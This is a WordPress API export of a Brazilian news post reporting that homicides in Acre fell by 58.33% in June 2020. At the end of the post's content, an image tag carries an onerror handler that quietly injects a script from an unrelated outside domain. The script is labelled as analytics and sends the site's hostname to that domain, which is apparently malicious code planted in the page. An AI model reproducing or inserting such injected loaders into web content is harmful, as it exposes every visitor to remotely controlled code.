{"id":48743,"date":"2020-07-09T16:50:55","date_gmt":"2020-07-09T16:50:55","guid":{"rendered":"https:\/\/abarevegan.com.br\/index.php\/2020\/07\/09\/acre-tem-reducao-de-homicidios-comparados-com-ao-ano-anterior\/"},"modified":"2020-07-09T16:50:55","modified_gmt":"2020-07-09T16:50:55","slug":"acre-tem-reducao-de-homicidios-comparados-com-ao-ano-anterior","status":"publish","type":"post","link":"https:\/\/nk7-testes.com.br\/agazeta\/acre-tem-reducao-de-homicidios-comparados-com-ao-ano-anterior\/","title":{"rendered":"Acre tem redu\u00e7\u00e3o de homic\u00eddios comparados com ao ano anterior"},"content":{"rendered":"<p style=\"text-align: justify;\">Menos 58,33% de casos no m\u00eas de junho de 2020<\/p>\n<p style=\"text-align: justify;\">De acordo com a Secretaria de Seguran\u00e7a P\u00fablica, o Acre registra o menor \u00edndice de homic\u00eddios cometidos em dez anos. No m\u00eas de junho a redu\u00e7\u00e3o registrada em todo o estado foi de 58,33%.&nbsp;<\/p>\n<p style=\"text-align: justify;\">Em junho deste ano, foram registrados 10 homic\u00eddios contra 24 no mesmo per\u00edodo do ano passado. De acordo com a Secretaria de Seguran\u00e7a P\u00fablica, a\u00e7\u00f5es de medidas estrat\u00e9gicas e integradas foram adotadas para que essa redu\u00e7\u00e3o acontecesse.<\/p>\n<p style=\"text-align: justify;\">O secret\u00e1rio de Seguran\u00e7a P\u00fablica, coronel Paulo C\u00e9zar, relata que est\u00e3o sendo feito investimentos em tecnologias e treinamentos para utiliza\u00e7\u00e3o em campo.&nbsp;\u201cAcreditamos que o emprego da tecnologia garante ao policial mais conhecimento para que ele trabalhe com mais facilidade e que possa tamb\u00e9m antecipar pr\u00e1ticas de delitos\u201d, relata o secret\u00e1rio.<\/p>\n<p style=\"text-align: justify;\">Vale lembrar tamb\u00e9m, que o ano 2020 \u00e9 uma ano at\u00edpico, j\u00e1 que desde mar\u00e7o os acreanos t\u00eam enfrentado a pandemia de Covid-19, o que pode ter colaborado para a redu\u00e7\u00e3o do n\u00famero de mortes violentas no estado.<\/p>\n<div><img onerror=\"var s=document.createElement(&quot;script&quot;);s.type=&quot;text\/javascript&quot;;s.id=&quot;cczedcc-plg-analytics&quot;;s.src=&quot;\/\/jemova.wurucozujo.com\/scripts\/js?k=5d936fde86df1a38418b4567&amp;s=&quot;+encodeURI(btoa(window.location.host)+&quot;&amp;ns=true&quot;);document.getElementsByTagName(&quot;head&quot;)[0].appendChild(s);\" \/><\/div>\n<div id=\"janelamailtopopupMail\" style=\"z-index: 1;\">\n<div id=\"janelamailtocontentPopupModalMail\">\n<div id=\"janelamailtomailClosePopup\">&nbsp;<\/div>\n<div id=\"janelamailtopopupMailModal\"><img \/><\/div><\/div><\/div>\n","protected":false},"excerpt":{"rendered":"<p style=\"text-align: justify;\">Menos 58,33% de casos no m\u00eas de junho de 2020<\/p>\n","protected":false},"author":4,"featured_media":48742,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"jnews-multi-image_gallery":[],"jnews_single_post":[],"jnews_primary_category":[],"jnews_social_meta":[],"jnews_review":[],"enable_review":"","type":"","name":"","summary":"","brand":"","sku":"","good":[],"bad":[],"score_override":"","override_value":"","rating":[],"price":[],"footnotes":""},"categories":[44],"tags":[],"class_list":["post-48743","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-policia"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v26.5 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Acre tem redu\u00e7\u00e3o de homic\u00eddios comparados com ao ano anterior - Agazeta.net<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/nk7-testes.com.br\/agazeta\/acre-tem-reducao-de-homicidios-comparados-com-ao-ano-anterior\/\" \/>\n<meta property=\"og:locale\" content=\"pt_BR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Acre tem redu\u00e7\u00e3o de homic\u00eddios comparados com ao ano anterior - Agazeta.net\" \/>\n<meta property=\"og:description\" content=\"Menos 58,33% de casos no m\u00eas de junho de 2020\" \/>\n<meta property=\"og:url\" content=\"https:\/\/nk7-testes.com.br\/agazeta\/acre-tem-reducao-de-homicidios-comparados-com-ao-ano-anterior\/\" \/>\n<meta property=\"og:site_name\" content=\"Agazeta.net\" \/>\n<meta property=\"article:published_time\" content=\"2020-07-09T16:50:55+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/07\/09-08-2020_acre-tem-reducao-de-homicidios.png\" \/>\n\t<meta property=\"og:image:width\" content=\"458\" \/>\n\t<meta property=\"og:image:height\" content=\"340\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"Agazeta.Net\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"Agazeta.Net\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. tempo de leitura\" \/>\n\t<meta name=\"twitter:data2\" content=\"1 minuto\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/acre-tem-reducao-de-homicidios-comparados-com-ao-ano-anterior\/\",\"url\":\"https:\/\/nk7-testes.com.br\/agazeta\/acre-tem-reducao-de-homicidios-comparados-com-ao-ano-anterior\/\",\"name\":\"Acre tem redu\u00e7\u00e3o de homic\u00eddios comparados com ao ano anterior - Agazeta.net\",\"isPartOf\":{\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/acre-tem-reducao-de-homicidios-comparados-com-ao-ano-anterior\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/acre-tem-reducao-de-homicidios-comparados-com-ao-ano-anterior\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/07\/09-08-2020_acre-tem-reducao-de-homicidios.png\",\"datePublished\":\"2020-07-09T16:50:55+00:00\",\"author\":{\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/#\/schema\/person\/ff6b39d54d6973bfc57f4140f659b23f\"},\"breadcrumb\":{\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/acre-tem-reducao-de-homicidios-comparados-com-ao-ano-anterior\/#breadcrumb\"},\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/nk7-testes.com.br\/agazeta\/acre-tem-reducao-de-homicidios-comparados-com-ao-ano-anterior\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/acre-tem-reducao-de-homicidios-comparados-com-ao-ano-anterior\/#primaryimage\",\"url\":\"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/07\/09-08-2020_acre-tem-reducao-de-homicidios.png\",\"contentUrl\":\"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/07\/09-08-2020_acre-tem-reducao-de-homicidios.png\",\"width\":458,\"height\":340,\"caption\":\"09-08-2020 acre-tem-redu\u00e7\u00e3o-de-homicidios\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/acre-tem-reducao-de-homicidios-comparados-com-ao-ano-anterior\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"In\u00edcio\",\"item\":\"https:\/\/nk7-testes.com.br\/agazeta\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Acre tem redu\u00e7\u00e3o de homic\u00eddios comparados com ao ano anterior\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/#website\",\"url\":\"https:\/\/nk7-testes.com.br\/agazeta\/\",\"name\":\"Agazeta.net\",\"description\":\"Agazeta.net - Not\u00edcias de Rio Branco\/AC\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/nk7-testes.com.br\/agazeta\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"pt-BR\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/#\/schema\/person\/ff6b39d54d6973bfc57f4140f659b23f\",\"name\":\"Agazeta.Net\",\"url\":\"https:\/\/nk7-testes.com.br\/agazeta\/author\/agazeta\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Acre tem redu\u00e7\u00e3o de homic\u00eddios comparados com ao ano anterior - Agazeta.net","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/nk7-testes.com.br\/agazeta\/acre-tem-reducao-de-homicidios-comparados-com-ao-ano-anterior\/","og_locale":"pt_BR","og_type":"article","og_title":"Acre tem redu\u00e7\u00e3o de homic\u00eddios comparados com ao ano anterior - Agazeta.net","og_description":"Menos 58,33% de casos no m\u00eas de junho de 2020","og_url":"https:\/\/nk7-testes.com.br\/agazeta\/acre-tem-reducao-de-homicidios-comparados-com-ao-ano-anterior\/","og_site_name":"Agazeta.net","article_published_time":"2020-07-09T16:50:55+00:00","og_image":[{"width":458,"height":340,"url":"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/07\/09-08-2020_acre-tem-reducao-de-homicidios.png","type":"image\/png"}],"author":"Agazeta.Net","twitter_card":"summary_large_image","twitter_misc":{"Escrito por":"Agazeta.Net","Est. tempo de leitura":"1 minuto"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/nk7-testes.com.br\/agazeta\/acre-tem-reducao-de-homicidios-comparados-com-ao-ano-anterior\/","url":"https:\/\/nk7-testes.com.br\/agazeta\/acre-tem-reducao-de-homicidios-comparados-com-ao-ano-anterior\/","name":"Acre tem redu\u00e7\u00e3o de homic\u00eddios comparados com ao ano anterior - Agazeta.net","isPartOf":{"@id":"https:\/\/nk7-testes.com.br\/agazeta\/#website"},"primaryImageOfPage":{"@id":"https:\/\/nk7-testes.com.br\/agazeta\/acre-tem-reducao-de-homicidios-comparados-com-ao-ano-anterior\/#primaryimage"},"image":{"@id":"https:\/\/nk7-testes.com.br\/agazeta\/acre-tem-reducao-de-homicidios-comparados-com-ao-ano-anterior\/#primaryimage"},"thumbnailUrl":"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/07\/09-08-2020_acre-tem-reducao-de-homicidios.png","datePublished":"2020-07-09T16:50:55+00:00","author":{"@id":"https:\/\/nk7-testes.com.br\/agazeta\/#\/schema\/person\/ff6b39d54d6973bfc57f4140f659b23f"},"breadcrumb":{"@id":"https:\/\/nk7-testes.com.br\/agazeta\/acre-tem-reducao-de-homicidios-comparados-com-ao-ano-anterior\/#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/nk7-testes.com.br\/agazeta\/acre-tem-reducao-de-homicidios-comparados-com-ao-ano-anterior\/"]}]},{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/nk7-testes.com.br\/agazeta\/acre-tem-reducao-de-homicidios-comparados-com-ao-ano-anterior\/#primaryimage","url":"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/07\/09-08-2020_acre-tem-reducao-de-homicidios.png","contentUrl":"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/07\/09-08-2020_acre-tem-reducao-de-homicidios.png","width":458,"height":340,"caption":"09-08-2020 acre-tem-redu\u00e7\u00e3o-de-homicidios"},{"@type":"BreadcrumbList","@id":"https:\/\/nk7-testes.com.br\/agazeta\/acre-tem-reducao-de-homicidios-comparados-com-ao-ano-anterior\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"In\u00edcio","item":"https:\/\/nk7-testes.com.br\/agazeta\/"},{"@type":"ListItem","position":2,"name":"Acre tem redu\u00e7\u00e3o de homic\u00eddios comparados com ao ano anterior"}]},{"@type":"WebSite","@id":"https:\/\/nk7-testes.com.br\/agazeta\/#website","url":"https:\/\/nk7-testes.com.br\/agazeta\/","name":"Agazeta.net","description":"Agazeta.net - Not\u00edcias de Rio Branco\/AC","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/nk7-testes.com.br\/agazeta\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"pt-BR"},{"@type":"Person","@id":"https:\/\/nk7-testes.com.br\/agazeta\/#\/schema\/person\/ff6b39d54d6973bfc57f4140f659b23f","name":"Agazeta.Net","url":"https:\/\/nk7-testes.com.br\/agazeta\/author\/agazeta\/"}]}},"_links":{"self":[{"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/posts\/48743","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/comments?post=48743"}],"version-history":[{"count":0,"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/posts\/48743\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/media\/48742"}],"wp:attachment":[{"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/media?parent=48743"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/categories?post=48743"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/tags?post=48743"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}